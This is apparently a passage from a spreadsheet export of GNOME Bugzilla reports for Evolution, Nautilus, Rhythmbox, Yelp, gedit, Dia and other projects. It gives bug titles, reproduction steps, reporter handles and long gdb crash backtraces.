#7  0x400799e8 in term_eval_or (f=0x86f4e58 argc=2 argv=0x814d798 
    data=0x4008bf08) at e-sexp.c:302
#8  0x4007a3d0 in e_sexp_term_eval (f=0x86f4e58 t=0x84d8958) at e-sexp.c:633
#9  0x4007b217 in e_sexp_eval (f=0x86f4e58) at e-sexp.c:1215
#10 0x40041841 in camel_folder_search_execute_expression (search=0x86f4c58 
    expr=0x87370d0  (or\n  \n\t(match-all (header-contains \Subject\ 
\test\
))\n     \n  \n\t(body-contains  \test\)\n     \n  )\n ex=0x8737028)
    at camel-folder-search.c:335
#11 0x40b4ad7a in imap_search_by_expression (folder=0x8213388 
    expression=0x87370d0  (or\n  \n\t(match-all (header-contains
\Subject\  \test\))\n     \n  \n\t(body-contains  \test\)\n     \n 
)\n ex=0x8737028)
    at camel-imap-folder.c:1282
#12 0x4004958a in camel_folder_search_by_expression (folder=0x8213388 
    expression=0x87370d0  (or\n  \n\t(match-all (header-contains
\Subject\  \test\))\n     \n  \n\t(body-contains  \test\)\n     \n 
)\n ex=0x8737028)
    at camel-folder.c:1057
#13 0x08096263 in regen_list_regen (mm=0x8737010) at message-list.c:2314
#14 0x0808a00f in mail_msg_received (e=0x812f860 msg=0x8737010 data=0x0)
    at mail-mt.c:334
#15 0x40078817 in thread_received_msg (e=0x812f860 m=0x8737010)
    at e-msgport.c:467
#16 0x40078963 in thread_dispatch (din=0x812f860) at e-msgport.c:538
#17 0x406a9bfd in pthread_start_thread (arg=0x433d4c00) at manager.c:262
#18 0x406a9cdf in pthread_start_thread_event (arg=0x433d4c00) at manager.c:285
Thread 6 (Thread 4101 (LWP 7710)):
#0  0x409688a5 in __sigsuspend (set=0x42b8385c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406ac0d9 in __pthread_wait_for_restart_signal (self=0x42b83c00)
#2  0x406add79 in __pthread_alt_lock (lock=0x823c1dc self=0x0) at restart.h:34
#3  0x406aac86 in __pthread_mutex_lock (mutex=0x823c1cc) at mutex.c:120
#4  0x40078d70 in e_mutex_lock (m=0x823c1c0) at e-msgport.c:711
#5  0x40b4ae15 in imap_search_free (folder=0x8213388 uids=0x84e4f84)
    at camel-imap-folder.c:1298
#6  0x40049692 in camel_folder_search_free (folder=0x8213388 result=0x84e4f84)
    at camel-folder.c:1086
#7  0x080965b9 in regen_list_regen (mm=0x873a570) at message-list.c:2417
#8  0x0808a00f in mail_msg_received (e=0x812f860 msg=0x873a570 data=0x0)
    at mail-mt.c:334
#9  0x40078817 in thread_received_msg (e=0x812f860 m=0x873a570)
    at e-msgport.c:467
#10 0x40078963 in thread_dispatch (din=0x812f860) at e-msgport.c:538
#11 0x406a9bfd in pthread_start_thread (arg=0x42b83c00) at manager.c:262
#12 0x406a9cdf in pthread_start_thread_event (arg=0x42b83c00) at manager.c:285
Thread 5 (Thread 3076 (unknown thread_db state 1)):
#0  __strtol_internal (nptr=??? endptr=??? base=??? group=???) at eval.c:36
Thread 4 (Thread 2051 (LWP 7707)):
#0  0x409688a5 in __sigsuspend (set=0x41b548ec)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406ac0d9 in __pthread_wait_for_restart_signal (self=0x41b54c00)
    at pthread.c:934
#2  0x406a8c5c in pthread_cond_wait (cond=0x812f850 mutex=0x812f830)
    at restart.h:34
#3  0x400781ec in e_msgport_wait (mp=0x812f808) at e-msgport.c:193
#4  0x40078913 in thread_dispatch (din=0x812f7b8) at e-msgport.c:514
#5  0x406a9bfd in pthread_start_thread (arg=0x41b54c00) at manager.c:262
#6  0x406a9cdf in pthread_start_thread_event (arg=0x41b54c00) at manager.c:285
Thread 3 (Thread 1026 (LWP 7706)):
#0  0x409688a5 in __sigsuspend (set=0x4135485c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406ac0d9 in __pthread_wait_for_restart_signal (self=0x41354c00)
    at pthread.c:934
#2  0x406add79 in __pthread_alt_lock (lock=0x823c1dc self=0x0) at restart.h:34
#3  0x406aac86 in __pthread_mutex_lock (mutex=0x823c1cc) at mutex.c:120
#4  0x40078d70 in e_mutex_lock (m=0x823c1c0) at e-msgport.c:711
#5  0x40b4ae15 in imap_search_free (folder=0x8213388 uids=0x84e4f9c)
    at camel-imap-folder.c:1298
#6  0x40049692 in camel_folder_search_free (folder=0x8213388 result=0x84e4f9c)
    at camel-folder.c:1086
#7  0x080965b9 in regen_list_regen (mm=0x871f318) at message-list.c:2417
#8  0x0808a00f in mail_msg_received (e=0x812f860 msg=0x871f318 data=0x0)
   at mail-mt.c:334
#9  0x40078817 in thread_received_msg (e=0x812f860 m=0x871f318)
    at e-msgport.c:467
#10 0x40078963 in thread_dispatch (din=0x812f860) at e-msgport.c:538
#11 0x406a9bfd in pthread_start_thread (arg=0x41354c00) at manager.c:262
#12 0x406a9cdf in pthread_start_thread_event (arg=0x41354c00) at manager.c:285
Thread 2 (Thread 2049 (LWP 7705)):
#0  0x40a1a227 in __poll (fds=0x814c57c nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x406a9900 in __pthread_manager (arg=0x18) at manager.c:136
#2  0x406aa499 in __pthread_manager_event (arg=0x18) at manager.c:218
Thread 1 (Thread 1024 (LWP 7645)):
#0  0x40a1a227 in __poll (fds=0x8737140 nfds=13 timeout=500)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x4056ea74 in g_main_poll (timeout=500 use_priority=0 priority=0)
    at gmain.c:1034
#2  0x4056e465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#3  0x4056e7e8 in g_main_run (loop=0x80f0b88) at gmain.c:935
#4  0x4048365b in gtk_main () at gtkmain.c:524
#5  0x4079c547 in bonobo_main () at bonobo-main.c:283
#6  0x08093054 in main (argc=1 argv=0xbffffa0c) at main.c:140#7 
0x40957177 in __libc_start_main (main=0x8092ed4  argc=1 
    ubp_av=0xbffffa0c init=0x8064000  fini=0x80c41cc  
    rtld_fini=0x4000e184  stack_end=0xbffffa04)
    at ../sysdeps/generic/libc-start.c:129
0x40b48434
667
in camel-imap-command.c</t>
  </si>
  <si>
    <t>EVOLUTION-259251</t>
  </si>
  <si>
    <t>lost Contact after cancelled moving action (List view)</t>
  </si>
  <si>
    <t>When Moving a Contact that already exists in the target folder the source
Contact will be deleted iw the move action is cancelled.
This happens in List View only Card View seems to not be affected.
Steps to reproduce the problem:
- create a new Contact doomed soul in Address Book Personal
- copy doomed soul to Addess Book test
  (we now have 2 identical Contacts)
- add additional information to doomed soul in Personal
- move doomed soul from Personal to test
  - an dialog appears as this Contact already exists
  - at this point the Contact already is *deleted* from Personal
- cancel the dialog to not add the Contact
Contact doomed soul in Personal is lost as is the additional info we
just added.
Reprodueable: always</t>
  </si>
  <si>
    <t>YELP-77382</t>
  </si>
  <si>
    <t>Yelp crashes repeatedly</t>
  </si>
  <si>
    <t>I'm using the current Yelp Debian package: 0.5-1. (there's no 0.5 target in
Bz!)
Start Yelp select the Writing ScrollKeeper OMF files manual.
When you get the divided screen with the index at the left and the manual
at the right click on About the OMF in the left window and press
PageDown. Boom Yelp will segfault.
Jordi</t>
  </si>
  <si>
    <t>jordi</t>
  </si>
  <si>
    <t>EVOLUTION-245333</t>
  </si>
  <si>
    <t>CTRL+TAB or F6 Move between Calendar TaskPad and the Folder List when moving around calendar</t>
  </si>
  <si>
    <t>Yang.Wu</t>
  </si>
  <si>
    <t>bolian.yin</t>
  </si>
  <si>
    <t>RHYTHMBOX-344595</t>
  </si>
  <si>
    <t>song_position_slider_hidden is not used on startup</t>
  </si>
  <si>
    <t>Hi
I called for testers of the 0.9.4.90 version in Debian and received the following bug report from Frederic Peters as Debian bug http://bugs.debian.org/372736:
Testing experimental rhythmbox as requested first regression I saw was that   
the slide bar was back while I set it as hidden previously.  Also it doesn't    
have the option to hide it in 'View' anymore [but I downgraded and it is not    
present in 0.9.4.1 either].                                                     
Anyway I checked in the .schemas and the option is still there.  I then tried   
gconf-editor and setting the option to false then true causes the slide bar to  
disappear as appropriate.                                                      
I could not reproduce this bug but I didn't have the setting set prior to the upgrade.
Bye</t>
  </si>
  <si>
    <t>GNOME-VFS-308639</t>
  </si>
  <si>
    <t>Dragging an item into the trash causes nautilus to freeze or crash</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: nautilus
Severity: normal
Version: GNOME2.10.1 2.10.1
Gnome-Distributor: Debian
Synopsis: Dragging an item into the trash causes nautilus to freeze or crash
Bugzilla-Product: nautilus
Bugzilla-Component: general
Bugzilla-Version: 2.10.1
BugBuddy-GnomeVersion: 2.0 (2.10.0)
Description:
Description of the crash:
Dragging an item into the trash will usually cause nautilus to freeze or
crash (which one it does seems to be random).  The freeze or crash
occurs at the point that the object being dragged to the trashcan passes
over the trashcan.  This never happens when one selects the move to
trash context-menu option on the object being trashed.
Steps to reproduce the crash:
1. Drag item to trash
2. Empty trash
3. Drag another item to the trash
Expected Results:
Item should be placed into trashcan
How often does this happen?
Every time after the trash has been emptied except for the first time
an item is dragged to the trashcan after nautilus has started up.  If
the trash is empty and nautilus has just been started the operation
will work fine as will all subsequent attempts to drag an item (I've
been testing with folders) to the trashcan.  But once the trash is
emptied the next attempt to drag an item to the trashcan will cause
nautilus to freeze/crash as described.
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/nautilus'
(no debugging symbols found)
Using host libthread_db library /lib/tls/libthread_db.so.1.
(no debugging symbols found)
`system-supplied DSO at 0xffffe000' has disappeared keeping its
symbols.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Thread debugging using libthread_db enabled]
[New Thread -1224416096 (LWP 11935)]
[New Thread -1235833936 (LWP 11939)]
[New Thread -1235571792 (LWP 11938)]
[New Thread -1235309648 (LWP 11937)]
[New Thread -1225774160 (LWP 11936)]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0xb7bdc561 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#0  0xb7bdc561 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0xb7dc1df6 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#2  
#3  0xb7712bb7 in gnome_vfs_format_file_size_for_display ()
   from /usr/lib/libgnomevfs-2.so.0
#4  0xb7712c1a in gnome_vfs_escape_path_string ()
   from /usr/lib/libgnomevfs-2.so.0
#5  0xb77114a5 in gnome_vfs_uri_append_path ()
   from /usr/lib/libgnomevfs-2.so.0
#6  0xb7714fd3 in _gnome_vfs_uri_resolve_all_symlinks_uri ()
   from /usr/lib/libgnomevfs-2.so.0
#7  0xb76f11f0 in gnome_vfs_find_directory_cancellable ()
   from /usr/lib/libgnomevfs-2.so.0
#8  0xb76fac98 in gnome_vfs_find_directory () from
/usr/lib/libgnomevfs-2.so.0
#9  0xb7f62253 in nautilus_drag_default_drop_action_for_icons ()
   from /usr/lib/libnautilus-private.so.2
#10 0xb7f8dfc2 in nautilus_self_check_icon_container ()
   from /usr/lib/libnautilus-private.so.2
#11 0xb7f8e9f2 in nautilus_icon_dnd_begin_drag ()
   from /usr/lib/libnautilus-private.so.2
#12 0xb7985943 in _gtk_marshal_BOOLEAN__OBJECT_INT_INT_UINT ()
   from /usr/lib/libgtk-x11-2.0.so.0
#13 0xb7738736 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#14 0xb7749dcf in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#15 0xb7748c8c in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#16 0xb7749216 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#17 0xb790d54b in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
#18 0xb790cee6 in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
#19 0xb790cf3a in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
#20 0xb790cf3a in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
#21 0xb790cf3a in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
#22 0xb790cf3a in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
#23 0xb790c64d in _gtk_drag_dest_handle_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
#24 0xb7982e9b in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#25 0xb78218e5 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#26 0xb75715c2 in g_main_depth () from /usr/lib/libglib-2.0.so.0
#27 0xb7572638 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#28 0xb7572970 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#29 0xb7572f13 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#30 0xb7982693 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#31 0x080796aa in main ()
Thread 5 (Thread -1225774160 (LWP 11936)):
#0  0xb73cf523 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb75732f6 in g_main_loop_get_context () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0xb75728f0 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb7572f13 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7613382 in link_thread_io_context () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#5  0xb758c6af in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb7bd6b63 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0xb73d818a in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread -1235309648 (LWP 11937)):
#0  0xb7bd9295 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb770fb04 in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#2  0xb770fb5f in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0xb758c6af in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7bd6b63 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb73d818a in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread -1235571792 (LWP 11938)):
#0  0xb7bd9295 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb770fb04 in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#2  0xb770fb5f in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0xb758c6af in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7bd6b63 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb73d818a in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread -1235833936 (LWP 11939)):
#0  0xb7bd9295 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb770fb04 in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#2  0xb770fb5f in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0xb758c6af in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7bd6b63 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0xb73d818a in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1224416096 (LWP 11935)):
#0  0xb7bdc561 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7dc1df6 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0xb7712bb7 in gnome_vfs_format_file_size_for_display ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#4  0xb7712c1a in gnome_vfs_escape_path_string ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#5  0xb77114a5 in gnome_vfs_uri_append_path ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#6  0xb7714fd3 in _gnome_vfs_uri_resolve_all_symlinks_uri ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#7  0xb76f11f0 in gnome_vfs_find_directory_cancellable ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#8  0xb76fac98 in gnome_vfs_find_directory () from
/usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#9  0xb7f62253 in nautilus_drag_default_drop_action_for_icons ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#10 0xb7f8dfc2 in nautilus_self_check_icon_container ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#11 0xb7f8e9f2 in nautilus_icon_dnd_begin_drag ()
   from /usr/lib/libnautilus-private.so.2
No symbol table info available.
#12 0xb7985943 in _gtk_marshal_BOOLEAN__OBJECT_INT_INT_UINT ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#13 0xb7738736 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0xb7749dcf in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0xb7748c8c in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0xb7749216 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0xb790d54b in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#18 0xb790cee6 in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#19 0xb790cf3a in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0xb790cf3a in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0xb790cf3a in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0xb790cf3a in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0xb790c64d in _gtk_drag_dest_handle_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0xb7982e9b in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#25 0xb78218e5 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#26 0xb75715c2 in g_main_depth () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#27 0xb7572638 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#28 0xb7572970 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#29 0xb7572f13 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#30 0xb7982693 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0x080796aa in main ()
No symbol table info available.
#0  0xb7bdc561 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2005-06-22 11:57 UTC -------
Unknown version 2.10.1 in product nautilus.  Setting version to 2.10.x.
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was kevin@sysexperts.com.
</t>
  </si>
  <si>
    <t>EVOLUTION-206647</t>
  </si>
  <si>
    <t>Crash on contact add then crash on all launches</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Critical
Version: 0.12
Synopsis: Crash on contact add then crash on all launches
Bugzilla-Product: Evolution
Bugzilla-Component: Addressbook
Description:
added contact 
clicked to save
application crashed
application is now crashing at start up 
this report is from a start up crash
Debugging Information:
[New Thread 1024 (LWP 10836)]
0x4091f509 in __wait4 () from /lib/libc.so.6
#0  0x4091f509 in __wait4 () from /lib/libc.so.6
#1  0x4098ba50 in __DTOR_END__ () from /lib/libc.so.6
#2  0x407e82b3 in waitpid (pid=10904 stat_loc=0xbfffde78 options=0)
    at wrapsyscall.c:174
#3  0x402be2a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x407e600e in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 
      edi = 135723560 esi = 135227304 ebp = 3221217856 esp = 3221217812 
      ebx = 1080363436 edx = 0 ecx = 135723448 eax = 1 trapno = 14 
      err = 4 eip = 0 cs = 35 __csh = 0 eflags = 2163206 
      esp_at_signal = 3221217812 ss = 43 __ssh = 0 fpstate = 0xbfffdf98 
      oldmask = 2147483648 cr2 = 0}) at signals.c:97
#5  
#0  0x4091f509 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4098ba50 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x407e82b3 in waitpid (pid=10904 stat_loc=0xbfffde78 options=0)
    at wrapsyscall.c:174
stat_loc = (int *) 0xbfffde78
options = 0
result = 0
oldtype = 0
#3  0x402be2a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 1083745040
in_segv = 1
pid = 0
#4  0x407e600e in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 
      edi = 135723560 esi = 135227304 ebp = 3221217856 esp = 3221217812 
      ebx = 1080363436 edx = 0 ecx = 135723448 eax = 1 trapno = 14 
      err = 4 eip = 0 cs = 35 __csh = 0 eflags = 2163206 
      esp_at_signal = 3221217812 ss = 43 __ssh = 0 fpstate = 0xbfffdf98 
      oldmask = 2147483648 cr2 = 0}) at signals.c:97
self = 0x407eef00
in_sighandler = 0x0
self = 0x407eef00
in_sighandler = 0x0
#5  
No locals.
#0  0x0 in ?? ()
No symbol table info available.
#0  0x0 in ?? ()
No symbol table info available.
Unknown reporter: iansim@attglobal.net changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>iansim</t>
  </si>
  <si>
    <t>DOXYGEN-163557</t>
  </si>
  <si>
    <t>Search engine is case sensitive</t>
  </si>
  <si>
    <t>The actual PHP based search engine is case sensitive. I think that should not be
because of the following reasons:
1. In big projects you often do not know the spelling of a class or function
name exactly.
2. If you search for words that are no programming language keywords you never
know how they are spelled.</t>
  </si>
  <si>
    <t>hst</t>
  </si>
  <si>
    <t>RHYTHMBOX-332488</t>
  </si>
  <si>
    <t>playlist drag &amp; drop</t>
  </si>
  <si>
    <t>Please describe the problem:
when you drag and drop a playlist to an usbkey folder sound files are deleted
from the filesystem. please stop that !!!
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>eric.basley</t>
  </si>
  <si>
    <t>GALEON-144067</t>
  </si>
  <si>
    <t>Galeon crashes when hitting the stop button</t>
  </si>
  <si>
    <t>Create a directory that the user running can access but not write to. Start a
download and tell Galeon to save to that directory. Click the stop button and
Galeon will crash.</t>
  </si>
  <si>
    <t>EVOLUTION-207492</t>
  </si>
  <si>
    <t>IMAP: does not expunge</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.12.99
Synopsis: IMAP: does not expunge 
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
IMAP does not expunge FOLDERS and does not  reconnect to servers 
Unknown reporter: frehberg@cs.tu-berlin.de changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>GNOME-DEVEL-DOCS-636641</t>
  </si>
  <si>
    <t>GNOME-DEVEL-DOCS</t>
  </si>
  <si>
    <t>initial checkin of the Python guitar-tuner demo app</t>
  </si>
  <si>
    <t>Here is the Guitar Tuner python version.  It requires a fix in gstreamer HEAD right now to run.  Also I didn't notice a glade file so I hacked one up quickly to test but I didn't check that in.  Not sure if the tutorials go over creating one or that is just an oversight.
In any case the app runs but I didn't here anything play.  That may be because my gstreamer build isn't setup correctly.  I'm not a gstreamer expert but the app runs events are fired and no error are printed to the console.</t>
  </si>
  <si>
    <t>gnome-devel-docs-maint</t>
  </si>
  <si>
    <t>GEDIT-519797</t>
  </si>
  <si>
    <t>Some menuitems are disabled after a file changes on disk until the user picks reload or cancel</t>
  </si>
  <si>
    <t>Please describe the problem:
When a file is changed on disk (by another process) then gedit asks to reload or cancel. Until the decision is made various menuitems are disabled.
Talking to pbor at #gedit this is intentional but perhaps some fine-tuning could be useful here. Specifically it would be helpful if the search menu (find find next etc.) were still active. Then a file that constantly changes on disk - say a logfile - could be searched without constant reloading.
In general I think it makes sense to disable options that relate to altering the file like replace paste etc. However options that are read-only like search copy etc. don't seem dangerous if enabled in this situation.
Original credit for noticing this issue goes to Adys here: https://bugs.launchpad.net/ubuntu/+source/gedit/+bug/197342
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>kripkensteiner</t>
  </si>
  <si>
    <t>DIA-350726</t>
  </si>
  <si>
    <t>WMF/EMF export does not use correct fonts</t>
  </si>
  <si>
    <t>Please describe the problem:
When exporting to WMF or EMF under Windows dia sometimes does not format the text according to diagram formatting but leaves fonts to default.
Steps to reproduce:
1. Create a new diagram and add some text.
2. Change the text formatting - e.g. change the font to Courier. Please note that this is NOT a TrueType font.
3. Export to EMF.
4. Open the EMF to see that the text is displayed with some kind of sans serif font but not Courier. This also affects layout - the text in the exported file takes a different amount of space (usually more) than in the original diagram.
Since by default dia uses the font sans for new text and it is not clear to the user which Windows font if any maps to sans this causes layout problems in the exported files.
However when using TrueType fonts for text the export is performed correctly. 
Actual results:
Expected results:
The WMF/EMF file to have text formatted in the same way as in the original diagram.
Does this happen every time?
yes
Other information:
OS: Windows Server 2003
Appearance - Windows Classic style with no customizations.</t>
  </si>
  <si>
    <t>bsb_2</t>
  </si>
  <si>
    <t>EVOLUTION-212996</t>
  </si>
  <si>
    <t>Keeping messages on the server</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 0.13
Synopsis: Keeping messages on the server
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
When synchronizing with my SMTP-mailserver old mail is not recognized as
mail that is already delivered so the mail keeps popping up twice
three times in my Inbox.
Unknown reporter: rigo@home.nl changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>rigo</t>
  </si>
  <si>
    <t>BOUNTIES-127535</t>
  </si>
  <si>
    <t>Birthday and anniversary calendar backend</t>
  </si>
  <si>
    <t>Evolution's contact editor allows you to annotate a contact with the dates
of their birthday and anniversary. However these dates  don't
automatically copy themselves into your calendar. Unless you explicitly add
the dates to your calendar you won't see them when you glance through your
schedule and an alarm won't fire to warn you of a friend's upcoming birthday.
Clearly this is a travesty.
The right solution is to create a special calendar backend which reads
birthdays and anniversaries out of the user's addressbook. Using Evolution
2.0's calendar aggregation feature the user can then overlay a friend's
important life events into the calendar view by clicking a single checkbox.
This bug is part of the Integrated Collaborative Desktop Bounty Hunt.  For
more information on prizes contest rules and other bounty tasks visit:
http://www.gnome.org/bounties/
If you would like to start working on this bounty please create a bugzilla
account and append your intention to work on this bounty to this bug.  If
multiple people declare their intentions to work on a task we encourage
you to join forces and work together.
Please do not close this bug.  The contest organizers will mark this bug as
FIXED when the prize is claimed.</t>
  </si>
  <si>
    <t>GNOME-UTILS-510190</t>
  </si>
  <si>
    <t>Cannot build gnome-vfs-2.20.1</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. It crashes with the report below
2. 
3. 
Stack trace:
I'm sorry about reporting here but I cannot find the proper place to report problems with gnome-vfs-2.20.1
The following compiler error is thrown.  I cannot build anything in this directiory.  I'm using linux slackware 12 with gcc 4.1.2.  As far as I can tell I've built the libraries on which this app depends.
Here's the code:
make[2]: Entering directory `/bausite/gnome-vfs-2.20.1/programs'
gcc -std=gnu99 -DHAVE_CONFIG_H -I. -I.. -I.. -I.. -DORBIT2=1 -pthread -I/usr/include/gconf/2 -I/usr/include/orbit-2.0 -I/usr/include/glib-1.2 -I/usr/lib/glib/include -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include    -DG_DISABLE_DEPRECATED    -g -O2 -MT gnomevfs-cat.o -MD -MP -MF .deps/gnomevfs-cat.Tpo -c -o gnomevfs-cat.o gnomevfs-cat.c
In file included from /usr/include/glib-2.0/gobject/gboxed.h:26
                 from /usr/include/glib-2.0/glib-object.h:25
                 from ../libgnomevfs/gnome-vfs-acl.h:29
                 from ../libgnomevfs/gnome-vfs.h:28
                 from gnomevfs-cat.c:27:
/usr/include/glib-2.0/gobject/gtype.h:92: error: expected '=' '' '' 'asm' or '__attribute__' before 'typedef'
/usr/include/glib-2.0/gobject/gtype.h:114: error: expected specifier-qualifier-list before 'GType'
From here the compiler throws error after error.  If I run make with -k nothing is built.
Other information:</t>
  </si>
  <si>
    <t>jkherr</t>
  </si>
  <si>
    <t>EVOLUTION-200594</t>
  </si>
  <si>
    <t>mail config check is spotty</t>
  </si>
  <si>
    <t>If you go into the config dialog before ever having run the druid you
can get into various odd states like filling everything in and having it
force you to run through the druid anyway.</t>
  </si>
  <si>
    <t>RHYTHMBOX-402384</t>
  </si>
  <si>
    <t>Rhythmbox fails to retrieve CD infomation On Solaris</t>
  </si>
  <si>
    <t>Please describe the problem:
